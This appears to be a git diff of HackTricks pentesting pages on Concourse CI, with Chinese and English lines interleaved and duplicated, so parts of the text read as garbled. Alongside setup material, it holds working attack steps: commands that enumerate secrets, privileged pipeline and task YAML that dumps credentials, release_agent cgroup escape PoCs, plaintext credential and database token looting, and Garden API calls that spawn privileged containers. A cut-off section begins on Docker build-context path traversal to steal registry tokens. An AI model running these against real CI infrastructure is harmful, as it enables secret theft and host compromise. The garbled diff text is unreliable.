- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
- **owner**: Team owners can **modify everything within the team**.
- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
> [!NOTE]
> 此外,**所有者、成员、管道操作员和查看者的权限可以通过配置 RBAC 进行修改**(更具体地说是配置其操作)。有关更多信息,请阅读:[https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
请注意,Concourse **将管道分组到团队中**。因此,属于某个团队的用户将能够管理这些管道,并且 **可能存在多个团队**。用户可以属于多个团队,并在每个团队中拥有不同的权限。
Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
### Vars & Credential Manager
在 YAML 配置中,您可以使用语法 `((_source-name_:_secret-path_._secret-field_))` 配置值。\
[来自文档:](https://concourse-ci.org/vars.html#var-syntax) **source-name 是可选的**,如果省略,将使用 [集群范围的凭证管理器](https://concourse-ci.org/vars.html#cluster-wide-credential-manager),或者可以 [静态提供](https://concourse-ci.org/vars.html#static-vars) 值。\
**可选的 \_secret-field**\_ 指定要读取的获取的秘密上的字段。如果省略,凭证管理器可以选择从获取的凭证中读取“默认字段”,如果该字段存在。\
此外_**secret-path**_ 和 _**secret-field**_ 如果 **包含特殊字符**(如 `.` `:`),可以用双引号 `"..."` 括起来。例如,`((source:"my.secret"."field:1"))` 将把 _secret-path_ 设置为 `my.secret`,并将 _secret-field_ 设置为 `field:1`
In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
#### 静态变量
#### Static Vars
Static vars can be specified in **tasks steps**:
静态变量可以在 **任务步骤** 中指定:
```yaml
- task: unit-1.13
file: booklit/ci/unit.yml
vars: { tag: 1.13 }
file: booklit/ci/unit.yml
vars: { tag: 1.13 }
```
使用以下 `fly` **参数**
- `-v``--var` `NAME=VALUE` 将字符串 `VALUE` 设置为变量 `NAME` 的值。
- `-y``--yaml-var` `NAME=VALUE``VALUE` 解析为 YAML并将其设置为变量 `NAME` 的值。
- `-i``--instance-var` `NAME=VALUE``VALUE` 解析为 YAML并将其设置为实例变量 `NAME` 的值。有关实例变量的更多信息,请参见 [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html)。
- `-l``--load-vars-from` `FILE` 加载 `FILE`,这是一个包含变量名称与值映射的 YAML 文档,并设置所有变量。
Or using the following `fly` **arguments**:
#### 凭证管理
- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
在管道中可以通过不同方式指定 **凭证管理器**,请阅读 [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html)。\
此外Concourse 支持不同的凭证管理器:
#### Credential Management
There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
Moreover, Concourse supports different credential managers:
- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
@@ -59,151 +61,160 @@ vars: { tag: 1.13 }
- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
> [!CAUTION]
> 请注意,如果您对 Concourse 有某种 **写入访问权限**,您可以创建作业来 **提取这些秘密**,因为 Concourse 需要能够访问它们。
> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
### Concourse 枚举
### Concourse Enumeration
为了枚举一个 concourse 环境,您首先需要 **收集有效凭证** 或找到一个 **认证令牌**,可能在 `.flyrc` 配置文件中。
In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
#### 登录和当前用户枚举
#### Login and Current User enum
- 登录时需要知道 **端点**、**团队名称**(默认是 `main`)和 **用户所属的团队**
- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
- 获取配置的 **目标**
- `fly targets`
- 检查配置的 **目标连接** 是否仍然 **有效**
- `fly -t <target> status`
- 获取用户在指定目标下的 **角色**
- `fly -t <target> userinfo`
- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
- Get configured **targets**:
- `fly targets`
- Get if the configured **target connection** is still **valid**:
- `fly -t <target> status`
- Get **role** of the user against the indicated target:
- `fly -t <target> userinfo`
> [!NOTE]
> 请注意,**API 令牌** 默认保存在 `$HOME/.flyrc` 中,您在盗取机器时可以在那里找到凭证。
> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials.
#### 团队与用户
#### Teams & Users
- 获取团队列表
- `fly -t <target> teams`
- 获取团队内的角色
- `fly -t <target> get-team -n <team-name>`
- 获取用户列表
- `fly -t <target> active-users`
- Get a list of the Teams
- `fly -t <target> teams`
- Get roles inside team
- `fly -t <target> get-team -n <team-name>`
- Get a list of users
- `fly -t <target> active-users`
#### 管道
#### Pipelines
- **List** pipelines:
- `fly -t <target> pipelines -a`
- **Get** pipeline yaml (**sensitive information** might be found in the definition):
- `fly -t <target> get-pipeline -p <pipeline-name>`
- Get all pipeline **config declared vars**
- `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
- **列出** 管道:
- `fly -t <target> pipelines -a`
- **获取** 管道 yaml**敏感信息**可能在定义中找到):
- `fly -t <target> get-pipeline -p <pipeline-name>`
- 获取所有管道 **配置声明的变量**
- `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
- 获取所有 **使用的管道秘密名称**(如果您可以创建/修改作业或劫持容器,您可以提取它们):
```bash
rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
echo $pipename;
fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
echo "";
echo $pipename;
fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
```
#### 容器与工作者
- 列出 **workers**:
- `fly -t <target> workers`
- 列出 **containers**:
- `fly -t <target> containers`
- 列出 **builds** (查看正在运行的内容):
- `fly -t <target> builds`
#### Containers & Workers
### Concourse 攻击
- List **workers**:
- `fly -t <target> workers`
- List **containers**:
- `fly -t <target> containers`
- List **builds** (to see what is running):
- `fly -t <target> builds`
#### 凭证暴力破解
### Concourse Attacks
#### Credentials Brute-Force
- admin:admin
- test:test
#### 秘密和参数枚举
#### Secrets and params enumeration
在上一节中,我们看到如何 **获取管道使用的所有秘密名称和变量**。这些 **变量可能包含敏感信息**,而 **秘密的名称在稍后尝试窃取** 时将非常有用。
In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
#### 在运行或最近运行的容器内会话
#### Session inside running or recently run container
If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using:
如果您拥有足够的权限 (**member role 或更高**) ,您将能够 **列出管道和角色**,并使用以下命令直接进入 `<pipeline>/<job>` **容器**
```bash
fly -t tutorial intercept --job pipeline-name/job-name
fly -t tutorial intercept # To be presented a prompt with all the options
```
凭借这些权限,您可能能够:
- **窃取** **容器** 内部的秘密
- 尝试 **逃离** 到节点
- 枚举/滥用 **云元数据** 端点(从 pod 和节点,如果可能的话)
With these permissions you might be able to:
#### 管道创建/修改
- **Steal the secrets** inside the **container**
- Try to **escape** to the node
- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
#### Pipeline Creation/Modification
If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
如果您拥有足够的权限(**成员角色或更高**),您将能够 **创建/修改新管道。** 请查看这个示例:
```yaml
jobs:
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
echo "$SUPER_SECRET"
sleep 1000
params:
SUPER_SECRET: ((super.secret))
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
echo "$SUPER_SECRET"
sleep 1000
params:
SUPER_SECRET: ((super.secret))
```
通过**修改/创建**新管道,您将能够:
- **窃取** **秘密**(通过回显它们或进入容器并运行 `env`
- **逃逸**到 **节点**(通过给予您足够的权限 - `privileged: true`
- 枚举/滥用 **云元数据** 端点(从 pod 和节点)
- **删除** 创建的管道
With the **modification/creation** of a new pipeline you will be able to:
#### 执行自定义任务
- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
- **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
- **Delete** created pipeline
#### Execute Custom Task
This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
这与之前的方法类似,但您可以**仅执行自定义任务**(这可能会更加**隐蔽**
```yaml
# For more task_config options check https://concourse-ci.org/tasks.html
platform: linux
image_resource:
type: registry-image
source:
repository: ubuntu
type: registry-image
source:
repository: ubuntu
run:
path: sh
args:
- -cx
- |
env
sleep 1000
path: sh
args:
- -cx
- |
env
sleep 1000
params:
SUPER_SECRET: ((super.secret))
SUPER_SECRET: ((super.secret))
```
```bash
fly -t tutorial execute --privileged --config task_config.yml
```
#### 从特权任务逃逸到节点
在前面的部分中,我们看到如何**使用 concourse 执行特权任务**。这不会给容器提供与 docker 容器中的特权标志完全相同的访问权限。例如,您不会在 /dev 中看到节点文件系统设备,因此逃逸可能会更“复杂”。
#### Escaping to the node from privileged task
In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
In the following PoC we are going to use the release_agent to escape with some small modifications:
在以下 PoC 中,我们将使用 release_agent 进行逃逸,并进行一些小的修改:
```bash
# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
@@ -261,12 +272,14 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
> [!WARNING]
> 正如您可能注意到的,这只是一个 [**常规的 release_agent 逃逸**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md),只是修改了节点中 cmd 的路径。
> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node
#### 从 Worker 容器逃逸到节点
#### Escaping to the node from a Worker container
A regular release_agent escape with a minor modification is enough for this:
一个常规的 release_agent 逃逸,稍作修改即可满足此需求:
```bash
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
@@ -293,11 +306,13 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
#### 从Web容器逃逸到节点
即使Web容器禁用了某些防御它也**不是以常见的特权容器运行**(例如,您**无法** **挂载**,并且**能力**非常**有限**,因此所有简单的逃逸方法都无效)。
#### Escaping to the node from the Web container
Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
However, it stores **local credentials in clear text**:
然而,它以明文形式存储**本地凭据**
```bash
cat /concourse-auth/local-users
test:test
@@ -306,9 +321,11 @@ env | grep -i local_user
CONCOURSE_MAIN_TEAM_LOCAL_USER=test
CONCOURSE_ADD_LOCAL_USER=test:test
```
您可以使用这些凭据**登录到网络服务器**并**创建一个特权容器并逃逸到节点**。
在环境中,您还可以找到信息以**访问concourse使用的postgresql**实例(地址、**用户名**、**密码**和数据库等其他信息):
You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**.
In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
```bash
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
@@ -329,35 +346,39 @@ select * from refresh_token;
select * from teams; #Change the permissions of the users in the teams
select * from users;
```
#### 滥用 Garden 服务 - 并非真正的攻击
#### Abusing Garden Service - Not a real Attack
> [!WARNING]
> 这些只是关于该服务的一些有趣笔记,但由于它仅在本地主机上监听,这些笔记不会带来我们尚未利用过的影响
> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
默认情况下,每个 concourse worker 将在 7777 端口运行一个 [**Garden**](https://github.com/cloudfoundry/garden) 服务。该服务由 Web 主机使用,以指示 worker **需要执行的内容**(下载镜像并运行每个任务)。这对攻击者来说听起来不错,但有一些很好的保护措施:
By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
- 它仅在 **本地暴露**127..0.0.1),我认为当 worker 使用特殊的 SSH 服务对 Web 进行身份验证时,会创建一个隧道,以便 Web 服务器可以 **与每个 worker 内的 Garden 服务进行通信**
- Web 服务器 **每隔几秒监控运行的容器**,并且 **意外的** 容器会被 **删除**。因此,如果您想要 **运行自定义容器**,您需要 **篡改** Web 服务器与 Garden 服务之间的 **通信**
- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
Concourse workers run with high container privileges:
Concourse workers 以高容器权限运行:
```
Container Runtime: docker
Has Namespaces:
pid: true
user: false
pid: true
user: false
AppArmor Profile: kernel
Capabilities:
BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled
```
然而,像**挂载**节点的/dev设备或release_agent这样的技术**无法工作**(因为节点的真实设备及其文件系统不可访问,只有一个虚拟设备)。我们无法访问节点的进程,因此在没有内核漏洞的情况下逃离节点变得复杂。
However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
> [!NOTE]
> 在上一节中,我们看到如何从特权容器中逃脱,因此如果我们可以在**当前** **工作者**创建的**特权容器****执行**命令,我们就可以**逃离到节点**
> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
请注意在玩concourse时我注意到当一个新容器被生成以运行某些内容时容器进程可以从工作者容器访问因此就像一个容器在内部创建一个新容器一样。
Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
**Getting inside a running privileged container**
**进入一个正在运行的特权容器**
```bash
# Get current container
curl 127.0.0.1:7777/containers
@@ -370,26 +391,30 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
# Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
```
**创建一个新的特权容器**
您可以非常轻松地创建一个新容器(只需运行一个随机 UID并在其上执行某些操作
**Creating a new privileged container**
You can very easily create a new container (just run a random UID) and execute something on it:
```bash
curl -X POST http://127.0.0.1:7777/containers \
-H 'Content-Type: application/json' \
-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
-H 'Content-Type: application/json' \
-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
# Wget will be stucked there as long as the process is being executed
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
```
然而web 服务器每隔几秒钟检查正在运行的容器,如果发现意外的容器,它将被删除。由于通信是在 HTTP 中进行的,您可以篡改通信以避免意外容器的删除:
However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
```
GET /containers HTTP/1.1.
Host: 127.0.0.1:7777.
@@ -411,8 +436,11 @@ Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
```
## 参考
## References
- [https://concourse-ci.org/vars.html](https://concourse-ci.org/vars.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,22 +2,25 @@
{{#include ../../banners/hacktricks-training.md}}
## 测试环境
## Testing Environment
### 运行 Concourse
### Running Concourse
#### 使用 Docker-Compose
#### With Docker-Compose
This docker-compose file simplifies the installation to do some tests with concourse:
此 docker-compose 文件简化了安装,以便进行一些与 concourse 的测试:
```bash
wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
docker-compose up -d
```
您可以从网络上下载适用于您的操作系统的命令行 `fly`,地址为 `127.0.0.1:8080`
#### 使用 Kubernetes推荐
You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
#### With Kubernetes (Recommended)
You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
您可以使用 helm-chart 轻松地在 **Kubernetes**(例如在 **minikube** 中)部署 concourse: [**concourse-chart**](https://github.com/concourse/concourse-chart)。
```bash
brew install helm
helm repo add concourse https://concourse-charts.storage.googleapis.com/
@@ -28,90 +31,94 @@ helm install concourse-release concourse/concourse
# If you need to delete it
helm delete concourse-release
```
在生成 concourse 环境后,您可以生成一个密钥并授予在 concourse web 中运行的 SA 访问 K8s 密钥的权限:
After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets:
```yaml
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: read-secrets
name: read-secrets
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get"]
resources: ["secrets"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: read-secrets-concourse
name: read-secrets-concourse
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: read-secrets
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: read-secrets
subjects:
- kind: ServiceAccount
name: concourse-release-web
namespace: default
name: concourse-release-web
namespace: default
---
apiVersion: v1
kind: Secret
metadata:
name: super
namespace: concourse-release-main
name: super
namespace: concourse-release-main
type: Opaque
data:
secret: MWYyZDFlMmU2N2Rm
secret: MWYyZDFlMmU2N2Rm
' | kubectl apply -f -
```
### 创建管道
管道由一个包含有序列表的 [Jobs](https://concourse-ci.org/jobs.html) 组成,该列表包含 [Steps](https://concourse-ci.org/steps.html)。
### Create Pipeline
### 步骤
A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
可以使用几种不同类型的步骤:
### Steps
- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **运行一个** [**task**](https://concourse-ci.org/tasks.html)
- the [`get` step](https://concourse-ci.org/get-step.html) 获取一个 [resource](https://concourse-ci.org/resources.html)
- the [`put` step](https://concourse-ci.org/put-step.html) 更新一个 [resource](https://concourse-ci.org/resources.html)
- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) 配置一个 [pipeline](https://concourse-ci.org/pipelines.html)
- the [`load_var` step](https://concourse-ci.org/load-var-step.html) 将值加载到 [local var](https://concourse-ci.org/vars.html#local-vars) 中
- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) 并行运行步骤
- the [`do` step](https://concourse-ci.org/do-step.html) 按顺序运行步骤
- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) 多次运行一个步骤;每种变量值组合运行一次
- the [`try` step](https://concourse-ci.org/try-step.html) 尝试运行一个步骤,即使步骤失败也会成功
Several different type of steps can be used:
每个 [step](https://concourse-ci.org/steps.html) 在 [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) 中在其 **自己的容器** 中运行。您可以在容器内运行任何您想要的内容 _(即运行我的测试,运行这个 bash 脚本,构建这个镜像等)_。因此如果您有一个包含五个步骤的作业Concourse 将为每个步骤创建五个容器。
- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
因此,可以指示每个步骤需要运行的容器类型。
Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
Therefore, it's possible to indicate the type of container each step needs to be run in.
### Simple Pipeline Example
### 简单管道示例
```yaml
jobs:
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
sleep 1000
echo "$SUPER_SECRET"
params:
SUPER_SECRET: ((super.secret))
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
sleep 1000
echo "$SUPER_SECRET"
params:
SUPER_SECRET: ((super.secret))
```
```bash
@@ -123,21 +130,25 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch
# From another console
fly -t tutorial intercept --job pipe-name/simple
```
检查 **127.0.0.1:8080** 以查看管道流程。
### 带有输出/输入管道的 Bash 脚本
Check **127.0.0.1:8080** to see the pipeline flow.
可以 **将一个任务的结果保存到文件中** 并指明它是一个输出然后将下一个任务的输入指明为上一个任务的输出。Concourse 的做法是 **在新任务中挂载上一个任务的目录,以便您可以访问上一个任务创建的文件**
### Bash script with output/input pipeline
### 触发器
It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
您不需要每次手动触发作业,您还可以编程使其每次运行时自动触发:
### Triggers
- 一段时间过去: [Time resource](https://github.com/concourse/time-resource/)
- 在主分支的新提交上: [Git resource](https://github.com/concourse/git-resource)
- 新的 PR [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
- 获取或推送您应用的最新镜像: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
查看一个在主分支新提交时触发的 YAML 管道示例,链接在 [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
- Some time passes: [Time resource](https://github.com/concourse/time-resource/)
- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,101 +0,0 @@
# 滥用 Docker Build Context 在 托管 构建器 (Path Traversal, Exfil, and Cloud Pivot)
{{#include ../banners/hacktricks-training.md}}
## TL;DR
如果 CI/CD 平台或托管 builder 允许贡献者指定 Docker build context 路径和 Dockerfile 路径,通常可以将 context 设置为父目录(例如 ".."),使主机文件成为构建上下文的一部分。然后,攻击者控制的 Dockerfile 可以 COPY 并外泄位于 builder 用户主目录的秘密(例如 ~/.docker/config.json。被盗的 registry tokens 也可能对提供商的 control-plane APIs 生效,从而实现组织范围的 RCE。
## 攻击面
许多托管 builder/registry 服务在构建用户提交的镜像时大致执行以下操作:
- 读取包含以下内容的 repo 级别配置:
- build context path (sent to the Docker daemon)
- Dockerfile path relative to that context
- 将指定的 build context 目录和 Dockerfile 复制到 Docker daemon
- 构建镜像并将其作为托管服务运行
如果平台没有对 build context 进行规范化和限制用户可以将其设置为仓库之外的位置path traversal导致构建用户可读的任意主机文件成为构建上下文的一部分并可在 Dockerfile 中通过 COPY 访问。
常见的实际约束:
